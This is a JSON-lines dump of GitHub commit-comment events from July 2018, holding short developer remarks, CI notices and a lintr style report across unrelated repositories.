{"id":"7971362724","type":"CommitCommentEvent","actor":{"login":"garazdawi"},"repo":{"name":"erlware/relx"},"payload":{"comment":{"id":29722251,"position":null,"line":null,"path":null,"commit_id":"78561dc7a812466aa1e8c9f36a6b48c7f7cc4195","created_at":"2018-07-16T15:19:59Z","updated_at":"2018-07-16T15:19:59Z","author_association":"NONE","body":"For some reason I recently stumbled onto this commit.\r\n\r\nThe difference between start_clean and no_dot_erlang is that the no_dot_erlang option is passed to systools:make_script. So it is not really correct to say that they are equal.\r\nThat being said, I'm not sure which one is best to be used by nodetool or other escripts."}},"created_at":"2018-07-16T15:19:59Z"}
{"id":"7971372682","type":"CommitCommentEvent","actor":{"login":"gtl90"},"repo":{"name":"gtl90/person-management-app"},"payload":{"comment":{"id":29722269,"position":4,"line":10,"path":".travis.yml","commit_id":"408262f44176a678969e9a132e90a7f3ca2e7a8e","created_at":"2018-07-16T15:21:34Z","updated_at":"2018-07-16T15:21:34Z","author_association":"OWNER","body":"not needed"}},"created_at":"2018-07-16T15:21:34Z"}
{"id":"7971373164","type":"CommitCommentEvent","actor":{"login":"jr719"},"repo":{"name":"jr719/test_demo"},"payload":{"comment":{"id":29722271,"position":null,"line":null,"path":null,"commit_id":"51cdb665cf576e9f1a2a9e4622d0ae2749eab3c7","created_at":"2018-07-16T15:21:39Z","updated_at":"2018-07-16T15:21:39Z","author_association":"OWNER","body":"df"}},"created_at":"2018-07-16T15:21:39Z"}
{"id":"7971373979","type":"CommitCommentEvent","actor":{"login":"AbimaelAlcebiades"},"repo":{"name":"AbimaelAlcebiades/codecombat"},"payload":{"comment":{"id":29722273,"position":null,"line":null,"path":null,"commit_id":"1d23029ce64309ef9b70bceca7466360f4b3d580","created_at":"2018-07-16T15:21:47Z","updated_at":"2018-07-16T15:21:47Z","author_association":"OWNER","body":"Update with master"}},"created_at":"2018-07-16T15:21:47Z"}
{"id":"7971376680","type":"CommitCommentEvent","actor":{"login":"tkntrec"},"repo":{"name":"tkntrec/EDCB"},"payload":{"comment":{"id":29722311,"position":null,"line":null,"path":null,"commit_id":"16301523b43881bfd99641a537959ddc9b255758","created_at":"2018-07-16T15:22:14Z","updated_at":"2018-07-16T15:22:14Z","author_association":"OWNER","body":"ただし、以前のコードでも現在のVSでのコンパイルなら実際には並び順は保存されていたはず。\r\n(EpgTimerで変更した場合は)"}},"created_at":"2018-07-16T15:22:14Z"}
{"id":"7971378536","type":"CommitCommentEvent","actor":{"login":"noon99jaki"},"repo":{"name":"noon99jaki/pra"},"payload":{"comment":{"id":29722315,"position":9,"line":62,"path":"edu/cmu/pra/model/Query.java","commit_id":"22759e5966fe68ef28a48ed4ae98f5832dd5b73f","created_at":"2018-07-16T15:22:32Z","updated_at":"2018-07-16T15:22:32Z","author_association":"OWNER","body":"maybe keep it uncommented just to be safe?"}},"created_at":"2018-07-16T15:22:32Z"}
{"id":"7971378696","type":"CommitCommentEvent","actor":{"login":"AbimaelAlcebiades"},"repo":{"name":"AbimaelAlcebiades/codecombat"},"payload":{"comment":{"id":29722317,"position":null,"line":null,"path":null,"commit_id":"1d23029ce64309ef9b70bceca7466360f4b3d580","created_at":"2018-07-16T15:22:33Z","updated_at":"2018-07-16T15:22:33Z","author_association":"OWNER","body":"teste"}},"created_at":"2018-07-16T15:22:33Z"}
{"id":"7971379801","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29722321,"position":null,"line":null,"path":null,"commit_id":"7b9b75baa3d9b70b71bf74ec59e644e91ed123ec","created_at":"2018-07-16T15:22:44Z","updated_at":"2018-07-16T15:22:44Z","author_association":"MEMBER","body":"Well, I'm neither concerned about A64 nor display output. Only concerned about bricking boards due to failing kernel updates from apt repo..."}},"created_at":"2018-07-16T15:22:44Z"}
{"id":"7971380403","type":"CommitCommentEvent","actor":{"login":"regel"},"repo":{"name":"regel/chronograf"},"payload":{"comment":{"id":29722322,"position":67,"line":67,"path":"ui/src/loudml/components/OneClickML.js","commit_id":"67ec05d94f1f7c0dad8a09c3b5c51018b6ee8d24","created_at":"2018-07-16T15:22:50Z","updated_at":"2018-07-16T15:22:50Z","author_association":"OWNER","body":" ... DEFAULT_MODEL cad?"}},"created_at":"2018-07-16T15:22:50Z"}
{"id":"7971382128","type":"CommitCommentEvent","actor":{"login":"lcl520rt"},"repo":{"name":"lcl520rt/xiahua"},"payload":{"comment":{"id":29722326,"position":1,"line":1,"path":"a.txt","commit_id":"171f733e203d9e7f0d4b73e2af3a35e17eee4a53","created_at":"2018-07-16T15:23:07Z","updated_at":"2018-07-16T15:23:07Z","author_association":"OWNER","body":"hahah nihao"}},"created_at":"2018-07-16T15:23:07Z"}
{"id":"7971383844","type":"CommitCommentEvent","actor":{"login":"TheQwertiest"},"repo":{"name":"marc2k3/foo_jscript_panel"},"payload":{"comment":{"id":29722328,"position":null,"line":null,"path":null,"commit_id":"027ae4fd83fb656dd697170aee2302dcdf224a2d","created_at":"2018-07-16T15:23:23Z","updated_at":"2018-07-16T15:23:23Z","author_association":"CONTRIBUTOR","body":">.>"}},"created_at":"2018-07-16T15:23:23Z"}
{"id":"7971388728","type":"CommitCommentEvent","actor":{"login":"tolearnmuch"},"repo":{"name":"tolearnmuch/ff"},"payload":{"comment":{"id":29722336,"position":1,"line":1,"path":"testing_alg.cpp","commit_id":"7b9d29c924fe87913937600f76e1d7bd55e7f43a","created_at":"2018-07-16T15:24:11Z","updated_at":"2018-07-16T15:24:11Z","author_association":"OWNER","body":"fa"}},"created_at":"2018-07-16T15:24:11Z"}
{"id":"7971390888","type":"CommitCommentEvent","actor":{"login":"mashedcode"},"repo":{"name":"Mailu/Mailu"},"payload":{"comment":{"id":29722342,"position":14,"line":16,"path":"postfix/conf/master.cf","commit_id":"a11eb4ba35530595b379ef95b239d4c04ee3e227","created_at":"2018-07-16T15:24:30Z","updated_at":"2018-07-16T15:24:30Z","author_association":"NONE","body":"Thanks, this was just me being stupid."}},"created_at":"2018-07-16T15:24:30Z"}
{"id":"7971391017","type":"CommitCommentEvent","actor":{"login":"regel"},"repo":{"name":"regel/chronograf"},"payload":{"comment":{"id":29722343,"position":30,"line":30,"path":"ui/src/loudml/components/OneClickML.js","commit_id":"67ec05d94f1f7c0dad8a09c3b5c51018b6ee8d24","created_at":"2018-07-16T15:24:31Z","updated_at":"2018-07-16T15:24:31Z","author_association":"OWNER","body":"Pas compris."}},"created_at":"2018-07-16T15:24:31Z"}
{"id":"7971392932","type":"CommitCommentEvent","actor":{"login":"crutchcorn"},"repo":{"name":"TheAndroidMaster/Pasta-for-Spotify"},"payload":{"comment":{"id":29722346,"position":null,"line":null,"path":null,"commit_id":"cc9e6d0b790be62ee48076312bc582905a922950","created_at":"2018-07-16T15:24:50Z","updated_at":"2018-07-16T15:24:50Z","author_association":"NONE","body":"such change, much wow"}},"created_at":"2018-07-16T15:24:50Z"}
{"id":"7971396536","type":"CommitCommentEvent","actor":{"login":"abompard"},"repo":{"name":"jeremycline/fedora-messaging"},"payload":{"comment":{"id":29722357,"position":null,"line":null,"path":null,"commit_id":"e57cde8412fd99c5d62579dc959cd01edbfaafd4","created_at":"2018-07-16T15:25:25Z","updated_at":"2018-07-16T15:25:25Z","author_association":"NONE","body":"This looks like it fixes the current test failures, do you want to make a PR? Are you waiting for something else?"}},"created_at":"2018-07-16T15:25:25Z"}
{"id":"7971420859","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29722412,"position":null,"line":null,"path":null,"commit_id":"2290a9a4667404728534d558dc9c1aec28e59a0f","created_at":"2018-07-16T15:29:20Z","updated_at":"2018-07-16T15:29:20Z","author_association":"NONE","body":"[R/berekenLSVIbasis.R:264:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/berekenLSVIbasis.R#L264) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>        .data$Habitattype,   #en hier zouden extra gegevens uit Data_habitat moeten toegevoegd worden\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:96:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/invoercontroleData_soortenKenmerken.R#L96) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:109:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/invoercontroleData_soortenKenmerken.R#L109) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande code mag weg zodra Gert deze Canonicalname toegevoegd heeft aan de databank\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_aantal.R:116:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_aantal.R#L116) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>setMethod(           #bij deze methode nog rekening houden met eventuele dubbels in de soortenlijst!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/selecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:482:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/inst/tests/testthat/test_1_databank.R#L482) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:483:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/inst/tests/testthat/test_1_databank.R#L483) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:485:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/inst/tests/testthat/test_berekenLSVIbasis.R#L485) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:486:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/inst/tests/testthat/test_berekenLSVIbasis.R#L486) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/2290a9a4667404728534d558dc9c1aec28e59a0f/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-16T15:29:20Z"}
{"id":"7971421302","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"openatv/MetrixHD"},"payload":{"comment":{"id":29722414,"position":null,"line":null,"path":null,"commit_id":"738ebf225ac945fee232b400a89fb7d76d304918","created_at":"2018-07-16T15:29:24Z","updated_at":"2018-07-16T15:29:24Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-16T15:29:24Z"}
{"id":"7971431169","type":"CommitCommentEvent","actor":{"login":"solardiz"},"repo":{"name":"besser82/libxcrypt"},"payload":{"comment":{"id":29722442,"position":null,"line":null,"path":null,"commit_id":"8edc9ec87449f680a44ed26845f75015e82688b4","created_at":"2018-07-16T15:31:01Z","updated_at":"2018-07-16T15:31:01Z","author_association":"NONE","body":"BTW, this commit is inconsistent with @zackw's preference for safety over negligible performance improvements. Luckily, we have the runtime self-test for bcrypt, so we're OK, but if we didn't I'd ask for this commit to be reverted. ;-)"}},"created_at":"2018-07-16T15:31:01Z"}
{"id":"7971437173","type":"CommitCommentEvent","actor":{"login":"sponte"},"repo":{"name":"eu-evops/selenium-pom"},"payload":{"comment":{"id":29722451,"position":null,"line":null,"path":null,"commit_id":"d9872339a4da9bdb1d805e1789ea1e81707114e5","created_at":"2018-07-16T15:32:00Z","updated_at":"2018-07-16T15:32:00Z","author_association":"COLLABORATOR","body":"TeamCity Selenium POM / CI [Build 161](https://teamcity.sponte.uk/viewLog.html?buildId=1555&buildTypeId=SeleniumPom_Ci) is now running\n"}},"created_at":"2018-07-16T15:32:00Z"}
{"id":"7971443549","type":"CommitCommentEvent","actor":{"login":"akashkrazy"},"repo":{"name":"akashkrazy/pan_score_calculation"},"payload":{"comment":{"id":29722463,"position":null,"line":null,"path":null,"commit_id":"a4d158cd843983f63a667c6291c16e8fe5fcd2e0","created_at":"2018-07-16T15:33:06Z","updated_at":"2018-07-16T15:33:06Z","author_association":"OWNER","body":"my new branch creation and so test folder"}},"created_at":"2018-07-16T15:33:06Z"}
{"id":"7971444225","type":"CommitCommentEvent","actor":{"login":"cfra"},"repo":{"name":"opensourcerouting/frr"},"payload":{"comment":{"id":29722464,"position":13,"line":13,"path":"isisd/fabricd.conf.sample","commit_id":"7157cce2785bca34540d316c5b47101787e7fef1","created_at":"2018-07-16T15:33:12Z","updated_at":"2018-07-16T15:33:12Z","author_association":"NONE","body":"I think we most certainly could. We just need to document it appropriately then, so that other implementations can interoperate."}},"created_at":"2018-07-16T15:33:12Z"}
{"id":"7971445190","type":"CommitCommentEvent","actor":{"login":"nikolowry"},"repo":{"name":"topjohnwu/MagiskManager"},"payload":{"comment":{"id":29722466,"position":null,"line":null,"path":null,"commit_id":"831112abd2d7fd3df0b1680d1c73c458512e7745","created_at":"2018-07-16T15:33:22Z","updated_at":"2018-07-16T15:33:22Z","author_association":"NONE","body":"What's the recommended way of updating now? I've been using this option for months on LineageOS. \r\n\r\nJust installed an OTA update and now if I reboot I'll be forced to spend a few minutes doing this through recovery"}},"created_at":"2018-07-16T15:33:22Z"}
{"id":"7971450396","type":"CommitCommentEvent","actor":{"login":"panva"},"repo":{"name":"GooGooBusser/node-oidc-provider"},"payload":{"comment":{"id":29722478,"position":null,"line":null,"path":null,"commit_id":"07cfa878524fc1c62124bc241b83af61b9dffa3b","created_at":"2018-07-16T15:34:17Z","updated_at":"2018-07-16T15:34:17Z","author_association":"NONE","body":"🤔 sorry for dropping in, but you can achieve the same with https://github.com/GooGooBusser/node-oidc-provider/blob/master/docs/configuration.md#extraparams"}},"created_at":"2018-07-16T15:34:17Z"}
{"id":"7971451021","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29722480,"position":null,"line":null,"path":null,"commit_id":"b9bf383653cad89cb10451a1072ada1161bea09e","created_at":"2018-07-16T15:34:24Z","updated_at":"2018-07-16T15:34:24Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-48](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-48-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T15:34:24Z"}
{"id":"7971452108","type":"CommitCommentEvent","actor":{"login":"M-Saleh"},"repo":{"name":"MayadaSaleh/Problem-Solving-Practice"},"payload":{"comment":{"id":29722484,"position":12,"line":12,"path":"src/leetcode/ArrayElements.java","commit_id":"7aa53894f2674e6498ce33ddb7728627c1dadfc6","created_at":"2018-07-16T15:34:34Z","updated_at":"2018-07-16T15:34:34Z","author_association":"COLLABORATOR","body":"ArrayElement not ArrayElement(s)"}},"created_at":"2018-07-16T15:34:34Z"}
{"id":"7971456923","type":"CommitCommentEvent","actor":{"login":"Lazerbeak12345"},"repo":{"name":"Lazerbeak12345/pixelmanipulator"},"payload":{"comment":{"id":29722492,"position":null,"line":null,"path":null,"commit_id":"a4617a37f2f6aa29df2649855e50612029fbbab7","created_at":"2018-07-16T15:35:22Z","updated_at":"2018-07-16T15:35:22Z","author_association":"OWNER","body":"see #2 "}},"created_at":"2018-07-16T15:35:22Z"}
{"id":"7971457272","type":"CommitCommentEvent","actor":{"login":"waau"},"repo":{"name":"x86cpu/android_kernel_lge_msm8996"},"payload":{"comment":{"id":29722496,"position":null,"line":null,"path":null,"commit_id":"2f1dcea99977c82d7dedc4ba27357e753073f3a3","created_at":"2018-07-16T15:35:26Z","updated_at":"2018-07-16T15:35:26Z","author_association":"NONE","body":"I see, thanks."}},"created_at":"2018-07-16T15:35:26Z"}
{"id":"7971457579","type":"CommitCommentEvent","actor":{"login":"M-Saleh"},"repo":{"name":"MayadaSaleh/Problem-Solving-Practice"},"payload":{"comment":{"id":29722497,"position":14,"line":14,"path":"src/leetcode/ArrayElements.java","commit_id":"7aa53894f2674e6498ce33ddb7728627c1dadfc6","created_at":"2018-07-16T15:35:29Z","updated_at":"2018-07-16T15:35:29Z","author_association":"COLLABORATOR","body":"Add modifier to attributes. private is recommended."}},"created_at":"2018-07-16T15:35:29Z"}
{"id":"7971460774","type":"CommitCommentEvent","actor":{"login":"Majkl578"},"repo":{"name":"doctrine/dbal"},"payload":{"comment":{"id":29722504,"position":16,"line":23,"path":".github/ISSUE_TEMPLATE/BC_Break.md","commit_id":"a7dc38d87bc5b89704b7c3388b1438701a4dfb0a","created_at":"2018-07-16T15:36:00Z","updated_at":"2018-07-16T15:36:00Z","author_association":"MEMBER","body":":trollface: "}},"created_at":"2018-07-16T15:36:00Z"}
{"id":"7971460824","type":"CommitCommentEvent","actor":{"login":"Skywalker-11"},"repo":{"name":"mailwatch/mailwatch-install-script"},"payload":{"comment":{"id":29722505,"position":null,"line":null,"path":null,"commit_id":"e8fd136f0dfe5b7ccd3793810b3a042e0fff1ae7","created_at":"2018-07-16T15:36:01Z","updated_at":"2018-07-16T15:36:01Z","author_association":"MEMBER","body":"Any reason why its InnoDB again?"}},"created_at":"2018-07-16T15:36:01Z"}
{"id":"7971464283","type":"CommitCommentEvent","actor":{"login":"hgouraud"},"repo":{"name":"geneweb/geneweb"},"payload":{"comment":{"id":29722511,"position":null,"line":null,"path":null,"commit_id":"cfe14bafec482f5d25a8b495fe25171f4cbe7444","created_at":"2018-07-16T15:36:36Z","updated_at":"2018-07-16T15:36:36Z","author_association":"CONTRIBUTOR","body":"Corrigé par Fabien il y a 3 heures!"}},"created_at":"2018-07-16T15:36:36Z"}
